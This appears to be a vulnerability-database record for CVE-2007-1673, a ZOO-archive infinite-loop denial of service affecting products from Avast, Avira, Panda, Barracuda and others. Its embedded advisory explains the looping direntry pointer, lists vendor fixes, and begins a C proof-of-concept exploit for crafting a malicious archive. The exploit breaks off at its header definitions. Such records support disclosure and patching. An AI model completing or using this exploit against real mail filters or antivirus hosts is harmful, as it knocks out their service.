            version: "6.35.00.00",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.0",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_900",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_400",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.1098",
         },
         {
            model: "antivirus",
            scope: "lte",
            trust: 1,
            vendor: "avast",
            version: "4.7.980",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_800",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.844",
         },
         {
            model: "antivirus and firewall",
            scope: "eq",
            trust: 1,
            vendor: "panda",
            version: "2007",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.691",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.869",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.652",
         },
         {
            model: "zoo",
            scope: "lte",
            trust: 1,
            vendor: "rahul dhesi",
            version: "2.10",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.394",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.665",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6",
         },
         {
            model: "picozip",
            scope: "eq",
            trust: 1,
            vendor: "picozip",
            version: "*",
         },
         {
            model: "antivir personal",
            scope: "eq",
            trust: 1,
            vendor: "avira",
            version: "*",
         },
         {
            model: "unzoo",
            scope: "eq",
            trust: 1,
            vendor: "unzoo",
            version: "4.4",
         },
         {
            model: "winace",
            scope: "eq",
            trust: 1,
            vendor: "winace",
            version: "*",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.1098",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.603",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.827",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.1043",
         },
         {
            model: "antivir personal",
            scope: "lte",
            trust: 1,
            vendor: "avira",
            version: "7.3.0.5",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 1,
            vendor: "avira",
            version: "7.04.00.23",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_200",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.691",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.844",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.869",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_100",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.665",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_500",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "panda",
            version: "2007",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.0",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 1,
            vendor: "avira",
            version: "*",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_600",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.827",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.1043",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.700",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.655",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.652",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_300",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "*",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.652",
         },
         {
            model: "activescan",
            scope: "eq",
            trust: 0.6,
            vendor: "panda",
            version: "5.53",
         },
         {
            model: "antivir personal",
            scope: "eq",
            trust: 0.6,
            vendor: "avira",
            version: "7.3.0.5",
         },
         {
            model: "zoo",
            scope: "eq",
            trust: 0.3,
            vendor: "zoo",
            version: "2.10",
         },
         {
            model: "winace",
            scope: "eq",
            trust: 0.3,
            vendor: "winace",
            version: "2.605",
         },
         {
            model: "winace",
            scope: "eq",
            trust: 0.3,
            vendor: "winace",
            version: "2.5",
         },
         {
            model: "winace",
            scope: "eq",
            trust: 0.3,
            vendor: "winace",
            version: "2.60",
         },
         {
            model: "unzoo",
            scope: "eq",
            trust: 0.3,
            vendor: "unzoo",
            version: "4.4-2",
         },
         {
            model: "picozip",
            scope: "eq",
            trust: 0.3,
            vendor: "picozip",
            version: "4.0.2",
         },
         {
            model: "picozip",
            scope: "eq",
            trust: 0.3,
            vendor: "picozip",
            version: "4.0.1",
         },
         {
            model: "titanium antivirus antispyware",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2006+",
         },
         {
            model: "titanium antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2005",
         },
         {
            model: "platinum internet security",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "20070",
         },
         {
            model: "platinum internet security",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2006",
         },
         {
            model: "antivirus platinum",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2.0",
         },
         {
            model: "antivirus for netware",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2.0",
         },
         {
            model: "activescan",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "5.54.1",
         },
         {
            model: "activescan",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "5.0",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.15026",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.1.18",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.1.17",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.03.055",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.03.053",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.03.022",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.01.001",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.0.54",
         },
         {
            model: "desktop for windows",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "1.00.00.68",
         },
         {
            model: "antivir workstation professional build",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "367",
         },
         {
            model: "antivir personaledition premium build",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "228",
         },
         {
            model: "antivir personaledition classic build",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "180",
         },
         {
            model: "avast! linux home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "1.0.5",
         },
         {
            model: "avast! linux home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "1.0.5-1",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.726",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.676",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.660",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.566",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.489",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.460",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.844",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.827",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.691",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.665",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.652",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.603",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.0",
         },
         {
            model: "antivirus managed client",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.394",
         },
         {
            model: "antivirus managed client",
            scope: null,
            trust: 0.3,
            vendor: "avast",
            version: null,
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.869",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.844",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.827",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.691",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.665",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.655",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.652",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.0",
         },
      ],
      sources: [
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [],
                  cpe_match: [
                     {
                        cpe23Uri: "cpe:2.3:a:panda:panda_antivirus:2007:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_200:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_300:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_400:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus:4.6.394:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus:4.7.652:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.6.691:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1043:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.844:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.869:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.691:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1043:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:picozip:picozip:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:panda:panda_antivirus_and_firewall:2007:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:unzoo:unzoo:4.4:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_500:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_600:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir_personal:*:*:classic:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir_personal:*:*:premium:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus:4.7.700:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "4.7.980",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1043:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1098:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.869:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1043:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1098:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_100:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir:6.35.00.00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir:7.04.00.23:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir_personal:7:*:classic:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:amavis:amavis:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "2.4.1",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.6.652:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.6.655:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.6.665:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.827:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.844:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.652:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.665:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.844:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.844:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.869:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:rahul_dhesi:zoo:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "2.10",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:winace:winace:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_800:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_900:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir_personal:7:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "7.3.0.5",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.6:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1098:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.827:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.6:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.603:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.827:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.827:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                  ],
                  operator: "OR",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Jean-Sebastien Guay-Leroux is credited with discovering this issue.",
      sources: [
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
      trust: 0.9,
   },
   cve: "CVE-2007-1673",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 7.8,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2007-1673",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-25035",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2007-1673",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-200705-118",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULHUB",
                  id: "VHN-25035",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. \nA successful attack can exhaust system resources and trigger a denial-of-service condition. \nThis issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. Topic:                  Multiple vendors ZOO file decompression infinite\n                         loop DoS\n\nAnnounced:              2007-05-04\nCredits:                Jean-Sebastien Guay-Leroux\nProducts:               Multiple (see section III)\nImpact:                 DoS (99% CPU utilisation)\nCVE ID:                 CVE-2007-1669, CVE-2007-1670, CVE-2007-1671,\n                         CVE-2007-1672, CVE-2007-1673\n\n\nI.      BACKGROUND\n\nZoo is a compression program and format developed by Rahul Dhesi in the mid\n1980s. The format is based on the LZW compression algorithm and compressed\nfiles are identified by the .zoo file extension. \n\n\nII.  The vulnerability lies in the algorithm used to locate the\nfiles inside the archive.  Each file in a ZOO archive is identified by a\ndirentry structure.  Those structures are linked between themselves with a\n'next' pointer.  This pointer is in fact an offset from the beginning of\nthe file, representing the next direntry structure.  By specifying an\nalready processed file, it's possible to process more than one time this\nsame file.  The ZOO parser will then enter an infinite loop condition. \n\n\nIII.    AFFECTED SOFTWARES\n\no Barracuda Spam Firewall\no Panda Software Antivirus\no avast! antivirus\no Avira AntiVir\no zoo-2.10\no unzoo.c\no WinAce\no PicoZip\n\n\nIV.     IMPACT\n\nIf this attack is conducted against a vulnerable antivirus, the host system\nwill have its CPU at 100% utilization and may have problems answering other\nrequests. \n\nIf this attack is conducted against an SMTP content filter running a\nvulnerable ZOO implementation, legitimate clients may be unable to send and\nreceive email through this server. \n\n\nV.      SOLUTION\n\no Barracuda Spam Firewall - CVE-2007-1669:\n   They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and\n   2.0.6399o for firmware < 3.4 March 19th 2007. \n\no Panda Software Antivirus - CVE-2007-1670:\n   They fixed this problem April 2nd 2007. \n\no avast! antivirus - CVE-2007-1672:\n   They fixed this problem in version 4.7.981, April 14th 2007. \n\no Avira AntiVir - CVE-2007-1671:\n   They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007. \n\no zoo-2.10 - CVE-2007-1669:\n   This software is not maintained anymore.  A patch for version 2.10 is\n   provided in section VII of this advisory because some SMTP content\n   filters may still use this software. \n\no unzoo.c - CVE-2007-1673:\n   This software is not maintained anymore.  No patch is provided for this\n   software. \n\no WinAce was contacted but no response was received from them. \n\no PicoZip was contacted but no response was received from them. \n\n\nVI.     PROOF OF CONCEPT\n\nUsing the PIRANA framework version 0.3.3, available at\nhttp://www.guay-leroux.com , it is possible to test your SMTP server\nagainst this vulnerability. \n\nAlternatively, here is an exploit that will create a file that will trigger\nthe infinite loop condition when it is processed. \n\n/*\n\nExploit for the vulnerability:\nMultiple vendors ZOO file decompression infinite loop DoS\n\ncoded by Jean-S\\xe9bastien Guay-Leroux\nSeptember 2006\n\n*/\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\n// Structure of a ZOO header\n\n#define ZOO_HEADER_SIZE         0x0000002a\n\n#define ZH_TEXT                 0\n#define ZH_TAG                  20\n#define ZH_START_OFFSET         24\n#define ZH_NEG_START_OFFSET     28\n#define ZH_MAJ_VER              32\n#define ZH_MIN_VER              33\n#define ZH_ARC_HTYPE            34\n#define ZH_ARC_COMMENT          35\n#define ZH_ARC_COMMENT_LENGTH   39\n#define ZH_VERSION_DATA         41\n\n\n#define D_DIRENTRY_LENGTH       56\n\n#define D_TAG                   0\n#define D_TYPE                  4\n#define D_PACKING_METHOD        5\n#define D_NEXT_ENTRY            6\n#define D_OFFSET                10\n#define D_DATE                  14\n#define D_TIME                  16\n#define 